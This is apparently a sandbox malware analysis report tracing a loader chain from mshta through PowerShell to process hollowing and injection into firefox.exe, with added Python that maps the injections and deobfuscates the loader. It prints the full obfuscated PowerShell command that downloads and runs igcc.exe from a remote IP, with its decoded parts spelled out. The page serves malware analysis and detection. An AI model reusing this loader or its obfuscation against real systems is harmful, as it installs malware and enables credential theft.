Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A33616 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A33616 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72619 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF866E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF866E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6A660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6A660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A69660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A69660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A62674 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4C640 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0003A124 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0003A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: amsi32_7716.amsi.csv, type: OTHER
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtCreateFile: Direct from: 0x77752FECJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtOpenFile: Direct from: 0x77752DCCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtSetInformationThread: Direct from: 0x777463F9Jump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtQueryInformationToken: Direct from: 0x77752CACJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtTerminateThread: Direct from: 0x77752FCCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtProtectVirtualMemory: Direct from: 0x77752F9CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtSetInformationProcess: Direct from: 0x77752C5CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtNotifyChangeKey: Direct from: 0x77753C2CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtOpenKeyEx: Direct from: 0x77752B9CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtOpenSection: Direct from: 0x77752E0CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtProtectVirtualMemory: Direct from: 0x77747B2EJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtAllocateVirtualMemory: Direct from: 0x777548ECJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtQueryVolumeInformationFile: Direct from: 0x77752F2CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtQuerySystemInformation: Direct from: 0x777548CCJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtAllocateVirtualMemory: Direct from: 0x77752BECJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtDeviceIoControlFile: Direct from: 0x77752AECJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtCreateUserProcess: Direct from: 0x7775371CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtWriteVirtualMemory: Direct from: 0x7775490CJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeNtQueryInformationProcess: Direct from: 0x77752C26Jump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtResumeThread: Direct from: 0x77752FBC
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtCreateKey: Direct from: 0x77752C6C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtReadVirtualMemory: Direct from: 0x77752E8C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtSetInformationThread: Direct from: 0x77752B4C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtQueryAttributesFile: Direct from: 0x77752E6C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtAllocateVirtualMemory: Direct from: 0x77753C9C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtClose: Direct from: 0x77752B6C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtUnmapViewOfSection: Direct from: 0x77752D3C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtCreateMutant: Direct from: 0x777535CC
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtWriteVirtualMemory: Direct from: 0x77752E3C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtMapViewOfSection: Direct from: 0x77752D1C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtResumeThread: Direct from: 0x777536AC
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtReadFile: Direct from: 0x77752ADC
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtQuerySystemInformation: Direct from: 0x77752DFC
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtDelayExecution: Direct from: 0x77752DDC
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | NtAllocateVirtualMemory: Direct from: 0x77752BFC
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe protection: read write
                  Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                  Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\AtBroker.exe | Thread register set: target process: 7756
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 319C008
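The lines above record every cross-process memory operation separately, so the shape of the attack only appears once they are joined up: igcc.exe starts a svchost.exe whose command line is igcc.exe's own path and maps an RWX section into it (the process-hollowing shape), that svchost.exe maps RWX sections into WRNKS5Hlc0y.exe and AtBroker.exe, and AtBroker.exe does the same into firefox.exe, the process it spawned. The Python below is an added example for this report page, not tooling from Joe Sandbox or code from the sample: it correlates events of this kind into an injection graph and reports the chains, the hollowed children and the browser targets. The EVENTS list is constructed from the report lines above with the paths as reported; the "Thread register set: target process: 7756" line is left out because it names the target only by PID.

```python
"""Correlate the cross-process memory events listed above into an injection
graph.  Added example for this report page; EVENTS is constructed from the
report's lines (paths as reported), not exported from Joe Sandbox."""
import ntpath
from collections import defaultdict

IGCC = r"C:\Users\user\AppData\Roaming\igcc.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
WRNKS = (r"C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP"
         r"\WRNKS5Hlc0y.exe")
ATBROKER = r"C:\Windows\SysWOW64\AtBroker.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
RWX = "execute and read and write"
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}

# (kind, source, target, detail); detail is the page protection for
# section_mapped and the child's command line for process_created.
EVENTS = [
    ("process_created", IGCC, SVCHOST, '"' + IGCC + '"'),
    ("section_mapped", IGCC, SVCHOST, RWX),
    ("memory_written", IGCC, SVCHOST, "base 319C008"),
    ("section_mapped", SVCHOST, WRNKS, RWX),
    ("section_mapped", SVCHOST, ATBROKER, RWX),
    ("process_created", WRNKS, ATBROKER, '"' + ATBROKER + '"'),
    ("section_mapped", ATBROKER, WRNKS, "read write"),
    ("section_mapped", ATBROKER, WRNKS, RWX),
    ("process_created", ATBROKER, FIREFOX, r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
    ("section_mapped", ATBROKER, FIREFOX, "read write"),
    ("section_mapped", ATBROKER, FIREFOX, RWX),
]


def exe_from_cmdline(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:].split('"', 1)[0]
    return cmdline.split(" ", 1)[0]


def hollowed_children(events):
    """Children whose command line names another executable than their image.
    igcc.exe starting svchost.exe with igcc.exe's own path as command line is
    the hollowing shape: the svchost image is only a shell for injected code."""
    return [(parent, image, cmdline) for kind, parent, image, cmdline in events
            if kind == "process_created"
            and ntpath.basename(exe_from_cmdline(cmdline)).lower()
            != ntpath.basename(image).lower()]


def injection_edges(events):
    """(source, target) -> evidence, for pairs where the source put executable
    memory into the target (RWX remote section or a remote write)."""
    evidence = defaultdict(set)
    for kind, src, dst, detail in events:
        if src == dst:
            continue
        if kind == "section_mapped" and detail == RWX:
            evidence[(src, dst)].add("rwx_section")
        elif kind == "memory_written":
            evidence[(src, dst)].add("remote_write")
        elif kind == "process_created":
            evidence[(src, dst)].add("parent")
    return {edge: kinds for edge, kinds in evidence.items()
            if kinds & {"rwx_section", "remote_write"}}


def injection_chains(edges):
    """Root-to-leaf paths through the injection graph as lists of basenames;
    a root is a process nobody wrote into."""
    graph = defaultdict(list)
    for src, dst in edges:
        graph[src].append(dst)
    targets = {dst for _, dst in edges}

    def walk(node, path):
        if node not in graph:
            yield path
            return
        for nxt in graph[node]:
            if nxt in path:  # cycle guard
                yield path
                continue
            yield from walk(nxt, path + [nxt])

    roots = sorted(src for src in graph if src not in targets)
    return sorted([ntpath.basename(p) for p in chain]
                  for root in roots for chain in walk(root, [root]))


def browser_targets(edges):
    """Injection edges that end in a browser: where the credential theft runs."""
    return sorted((ntpath.basename(s), ntpath.basename(d))
                  for s, d in edges if ntpath.basename(d).lower() in BROWSERS)


if __name__ == "__main__":
    edges = injection_edges(EVENTS)
    for chain in injection_chains(edges):
        print(" -> ".join(chain))
    print("hollowed:", hollowed_children(EVENTS))
    print("browser targets:", browser_targets(edges))
```

Run stand-alone it prints the three chains rooted at igcc.exe (through svchost.exe into WRNKS5Hlc0y.exe, and through svchost.exe and AtBroker.exe into WRNKS5Hlc0y.exe and firefox.exe), the hollowed svchost.exe child and the AtBroker.exe to firefox.exe edge. Note that WRNKS5Hlc0y.exe spawning AtBroker.exe is not an injection edge by itself: the executable memory in AtBroker.exe came from svchost.exe.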
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000687B1 LogonUserW,12_2_000687B1
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00013B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00013B3A
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_000148D7
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00074C27 mouse_event,12_2_00074C27
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'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'+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\igcc.exe "C:\Users\user\AppData\Roaming\igcc.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD004.tmp" "c:\Users\user\AppData\Local\Temp\qetstupm\CSCEF30E185BA76444FA670BC63B6F1A196.TMP"
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\igcc.exe"
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe | Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
                  Source: C:\Windows\SysWOW64\AtBroker.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfpzb2roaddrwcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkrc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tru1irvjkrwzptkl0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxtb04uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbvb2pxamtslhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbhyw15wg92b08sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihzhy09aufhyacx1aw50icagicagicagicagicagicagicagicagicagicagicagiejauxhpdvkssw50uhryicagicagicagicagicagicagicagicagicagicagicagihhibck7jyagicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicaiy09pym9liiagicagicagicagicagicagicagicagicagicagicagicattmftrxnqyunlicagicagicagicagicagicagicagicagicagicagicagigxbdcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrac29kagg3a1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljiwoc4yms8ymzmvawdjyy5leguilcikru5wokfquerbvefcawdjyy5leguildasmck7c3rhunqtc0xlzvaomyk7aw52t0tllwlurw0gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxpz2njlmv4zsi='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfpzb2roaddrwcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkrc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tru1irvjkrwzptkl0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxtb04uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbvb2pxamtslhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbhyw15wg92b08sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihzhy09aufhyacx1aw50icagicagicagicagicagicagicagicagicagicagicagiejauxhpdvkssw50uhryicagicagicagicagicagicagicagicagicagicagicagihhibck7jyagicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicaiy09pym9liiagicagicagicagicagicagicagicagicagicagicagicattmftrxnqyunlicagicagicagicagicagicagicagicagicagicagicagigxbdcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrac29kagg3a1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljiwoc4yms8ymzmvawdjyy5leguilcikru5wokfquerbvefcawdjyy5leguildasmck7c3rhunqtc0xlzvaomyk7aw52t0tllwlurw0gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxpz2njlmv4zsi='+[char]34+'))')))"
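The mshta.exe > cmd.exe > powershell.exe command lines above hide the second stage behind three layers: case-mangled cmdlet and type names, an expression rebuilt at run time from 'literal' fragments and [char] codes (so the tokens "::" and the double quote never appear in the command line), and a base64 body padded with long runs of spaces. The Python below is an added example for this report page, not code from the sample, from Joe Sandbox or from any tool named on the page. It rebuilds the concatenation, decodes the base64 body and pulls out the download URL and drop path. The decoded payload is an Add-Type P/Invoke of urlmon!URLDownloadToFile that fetches igcc.exe from 172.245.208.21 into %APPDATA% and starts it, which is what the csc.exe/cvtres.exe compile and the igcc.exe launch in the process lines above show happening. The base64 argument is rebuilt from the report's blob with its whitespace padding written as repeated 'ICAg' groups (the decoder collapses the padding anyway), and the last function shows that a lowercased copy of the command line, the form the Sigma-matched lines above are stored in, no longer decodes, because base64 is case-sensitive.

```python
"""Static deobfuscation of the mshta.exe > cmd.exe > powershell.exe loader
command line recorded above.  Added example for this report page; not code
from the sample, from Joe Sandbox or from any tool named on the page."""
import base64
import re

# Base64 argument of the observed command line.  The obfuscator put a long run
# of spaces between tokens; each run is the group 'ICAg' (three spaces)
# repeated, written as PAD so the literal stays readable.  Count taken from the
# report's blob; the decoder collapses the padding anyway.
PAD = "ICAg" * 11
B64_PARTS = [
    "JFpzb2RoaDdrWCAg",                      # $Zsodhh7kX
    "ICA9",                                  # =
    "IGFkRC1UeXBl",                          # adD-Type
    "IC1tRU1iRVJkRWZpTkl0aU9u",              # -mEMbERdEfiNItiOn
    "ICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwg",  # '[DllImport("uRLmoN.dLL",
    "Q2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4g"
    "SW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAg",  # ... URLDownloadToFile(IntPtr
    "ICBVb2pXamtsLHN0cmluZyAg",              # UojWjkl,string
    "ICBhYW15WG92b08sc3RyaW5n",              # aamyXovoO,string
    "IHZHY09aUFhYaCx1aW50",                  # vGcOZPXXh,uint
    "IEJaUXhpdVksSW50UHRy",                  # BZQxiuY,IntPtr
    "IHhIbCk7JyAg",                          # xHl);'
    "IC1OYW1F",                              # -NamE
    "ICAiY09pYm9lIiAg",                      # "cOiboe"
    "IC1OYW1Fc1BhQ2Ug",                      # -NamEsPaCe
    "IGxBdCAg",                              # lAt
    "IC1QYXNzVGhydTsg",                      # -PassThru;
    "ICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMv"
    "aWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0g",
    "IiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI=",      # "$eNv:APPDATA\igcc.exe"
]
OBSERVED_B64 = PAD.join(B64_PARTS)

# The cmd.exe command line as the report records it; -Ex/-NOp/-w 1/-C are
# prefixes of -ExecutionPolicy Bypass, -NoProfile, -WindowStyle 1 (Hidden), -Command.
OBSERVED_CMDLINE = (
    '"C:\\Windows\\system32\\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C '
    "DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a"
    "+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58"
    "+'FrOmbAse64STRinG('+[CHar]0X22+'" + OBSERVED_B64 + "'+[CHaR]34+'))')))\""
)

# 'literal' fragments and [char]N / [char]0xNN pieces, in order of appearance.
PS_PIECE = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
B64_CALL = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)


def rebuild_concatenation(expr: str) -> str:
    """Join a PowerShell expression built only from 'literal' + [char]N pieces.
    Operators, casts and the IEX(...) wrappers are skipped, so the case-mangled
    spellings need no handling."""
    out = []
    for literal, code in PS_PIECE.findall(expr):
        if code:
            out.append(chr(int(code, 16 if code.lower().startswith("0x") else 10)))
        else:
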